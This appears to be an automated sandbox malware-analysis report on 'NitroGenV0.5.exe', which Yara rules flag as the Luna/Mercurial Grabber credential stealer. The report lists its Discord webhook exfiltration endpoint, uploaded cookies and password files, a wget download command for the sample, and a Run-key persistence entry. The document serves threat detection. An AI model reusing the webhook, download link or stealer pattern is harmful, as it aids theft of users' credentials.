                        Source: NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmp, ConDrv.17.drString found in binary or memory: https://cdn.discordapp.com/attachments/903671493853077534/906810339021168680/cookies.txt
                        Source: NitroGenV0.5.exe, 00000011.00000002.350682711.00000000028F7000.00000004.00000001.sdmp, ConDrv.17.drString found in binary or memory: https://cdn.discordapp.com/attachments/903671493853077534/906810341642612736/passwords.txt
                        Source: NitroGenV0.5.exe, 00000011.00000002.350726464.0000000002932000.00000004.00000001.sdmp, ConDrv.17.drString found in binary or memory: https://cdn.discordapp.com/attachments/903671493853077534/906810352568766474/Capture.jpg
                        Source: NitroGenV0.5.exe, NitroGenV0.5.exe, 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, NitroGenV0.5.exe.6.drString found in binary or memory: https://cdn.discordapp.com/avatars/
                        Source: NitroGenV0.5.exe, 00000006.00000002.302856021.0000000002D5C000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350460138.00000000027EC000.00000004.00000001.sdmpString found in binary or memory: https://discord.com
                        Source: NitroGenV0.5.exe, NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmp, NitroGenV0.5.exe.6.drString found in binary or memory: https://discord.com/api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw
                        Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350682711.00000000028F7000.00000004.00000001.sdmpString found in binary or memory: https://discord.com8
                        Source: NitroGenV0.5.exe, 00000006.00000002.302856021.0000000002D5C000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350460138.00000000027EC000.00000004.00000001.sdmpString found in binary or memory: https://discord.comx
                        Source: NitroGenV0.5.exe, NitroGenV0.5.exe, 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, NitroGenV0.5.exe.6.drString found in binary or memory: https://discordapp.com/api/v8/users/
                        Source: NitroGenV0.5.exe.6.drString found in binary or memory: https://i.imgur.com/vgxBhmx.png
                        Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmpString found in binary or memory: https://i.imgur.com/vgxBhmx.pngultipart/form-data
                        Source: NitroGenV0.5.exe, NitroGenV0.5.exe, 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, NitroGenV0.5.exe.6.drString found in binary or memory: https://ip4.seeip.org
                        Source: NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmpString found in binary or memory: https://ip4.seeip.org/
                        Source: NitroGenV0.5.exe, 00000006.00000002.302762513.0000000002CF9000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350268413.0000000002711000.00000004.00000001.sdmpString found in binary or memory: https://ip4.seeip.orgx
                        Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000006.00000002.302988572.0000000002DC5000.00000004.00000001.sdmp, ConDrv.6.drString found in binary or memory: https://media.discordapp.net/attachments/903671493853077534/906810248877211688/cookies.txt
                        Source: NitroGenV0.5.exe, 00000006.00000002.303106911.0000000002E67000.00000004.00000001.sdmp, ConDrv.6.drString found in binary or memory: https://media.discordapp.net/attachments/903671493853077534/906810251381211176/passwords.txt
                        Source: NitroGenV0.5.exe, 00000006.00000002.303147034.0000000002EA2000.00000004.00000001.sdmp, ConDrv.6.drString found in binary or memory: https://media.discordapp.net/attachments/903671493853077534/906810260252164166/Capture.jpg
                        Source: NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmp, ConDrv.17.drString found in binary or memory: https://media.discordapp.net/attachments/903671493853077534/906810339021168680/cookies.txt
                        Source: NitroGenV0.5.exe, 00000011.00000002.350682711.00000000028F7000.00000004.00000001.sdmp, ConDrv.17.drString found in binary or memory: https://media.discordapp.net/attachments/903671493853077534/906810341642612736/passwords.txt
                        Source: NitroGenV0.5.exe, 00000011.00000002.350726464.0000000002932000.00000004.00000001.sdmp, ConDrv.17.drString found in binary or memory: https://media.discordapp.net/attachments/903671493853077534/906810352568766474/Capture.jpg
                        Source: NitroGenV0.5.exe, 00000006.00000002.302816261.0000000002D42000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350682711.00000000028F7000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350548671.000000000285E000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
                        Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                        Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                        Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                        Source: NitroGenV0.5.exe, 00000006.00000002.303043873.0000000002E00000.00000004.00000001.sdmp, NitroGenV0.5.exe, 00000011.00000002.350603986.000000000288F000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                        Source: NitroGenV0.5.exe, NitroGenV0.5.exe, 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, NitroGenV0.5.exe.6.drString found in binary or memory: https://www.countryflags.io/
                        Source: NitroGenV0.5.exe, 00000011.00000002.350460138.00000000027EC000.00000004.00000001.sdmpString found in binary or memory: https://www.countryflags.io/CH/flat/48.png
                        Source: unknownHTTP traffic detected: POST /api/webhooks/903671676842164224/hgVlAW5LCUzPj7SU-155WPmokQU8kGZJo2PMKC5I1ao5YwOw7U4zsmJgE8WpgziY0apY HTTP/1.1Content-Type: application/jsonHost: discord.comContent-Length: 448Expect: 100-continueConnection: Keep-Alive
                        Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
                        Source: global trafficHTTP traffic detected: GET /attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoAccept: */*Accept-Encoding: identityHost: cdn.discordapp.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ip4.seeip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ip4.seeip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET //json/84.17.52.68 HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET //json/84.17.52.68 HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49741 version: TLS 1.2

                        E-Banking Fraud:

                        barindex
                        Yara detected MercurialGrabberShow sources
                        Source: Yara matchFile source: 6.2.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.0.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.0.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000006.00000002.302148131.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000000.280072477.00000000008E2000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.349541770.0000000000512000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000000.324764469.0000000000512000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: NitroGenV0.5.exe PID: 6784, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: NitroGenV0.5.exe PID: 7100, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\Desktop\download\NitroGenV0.5.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe, type: DROPPED

                        System Summary:

                        barindex
                        Malicious sample detected (through community Yara rule)Show sources
                        Source: 6.2.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPEMatched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
                        Source: 17.0.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
                        Source: 6.0.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPEMatched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
                        Source: 17.2.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe, type: DROPPEDMatched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe, type: DROPPEDMatched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
                        Source: 6.2.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
                        Source: 17.0.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
                        Source: 6.0.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
                        Source: 17.2.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe, type: DROPPEDMatched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe, type: DROPPEDMatched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeCode function: 6_2_00007FFC08BB61F66_2_00007FFC08BB61F6
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeCode function: 6_2_00007FFC08BBBD996_2_00007FFC08BBBD99
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeCode function: 6_2_00007FFC08BB6FA26_2_00007FFC08BB6FA2
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeCode function: 17_2_00007FFC08936FA217_2_00007FFC08936FA2
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeCode function: 17_2_00007FFC0893BD9917_2_00007FFC0893BD99
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeCode function: 17_2_00007FFC089361F617_2_00007FFC089361F6
                        Source: NitroGenV0.5.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: NitroGenV0.5.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: C:\Windows\SysWOW64\wget.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe" > cmdline.out 2>&1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe"
                        Source: unknownProcess created: C:\Users\user\Desktop\download\NitroGenV0.5.exe "C:\Users\user\Desktop\download\NitroGenV0.5.exe"
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe "C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe"
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Desktop\cmdline.outJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeFile created: C:\Users\user\AppData\Local\Temp\cookies.dbJump to behavior
                        Source: classification engineClassification label: mal100.troj.spyw.evad.win@8/11@7/5
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                        Source: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6992:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7028:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3940:120:WilError_01
                        Source: C:\Windows\SysWOW64\wget.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\wget.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeAutomated click: OK
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeAutomated click: OK
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeAutomated click: OK
                        Source: Window RecorderWindow detected: More than 3 window changes detected

                        Data Obfuscation:

                        barindex
                        Detected unpacking (overwrites its own PE header)Show sources
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeUnpacked PE file: 6.2.NitroGenV0.5.exe.8e0000.0.unpack
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeUnpacked PE file: 17.2.NitroGenV0.5.exe.510000.0.unpack
                        Source: C:\Windows\SysWOW64\wget.exeCode function: 4_2_009F29B6 pushfd ; ret 4_2_009F2CF2
                        Source: C:\Windows\SysWOW64\wget.exeCode function: 4_2_009EC354 push eax; ret 4_2_009EC355
                        Source: C:\Windows\SysWOW64\wget.exeCode function: 4_2_009EC350 push eax; ret 4_2_009EC351
                        Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeCode function: 17_2_00007FFC08930443 pushad ; ret 17_2_00007FFC08930451
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeFile created: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exeJump to dropped file
                        Source: C:\Windows\SysWOW64\wget.exeFile created: C:\Users\user\Desktop\download\NitroGenV0.5.exeJump to dropped file
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Mercurial GrabberJump to behavior
                        Source: C:\Users\user\Desktop\download\NitroGenV0.5.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Mercurial GrabberJump to behavior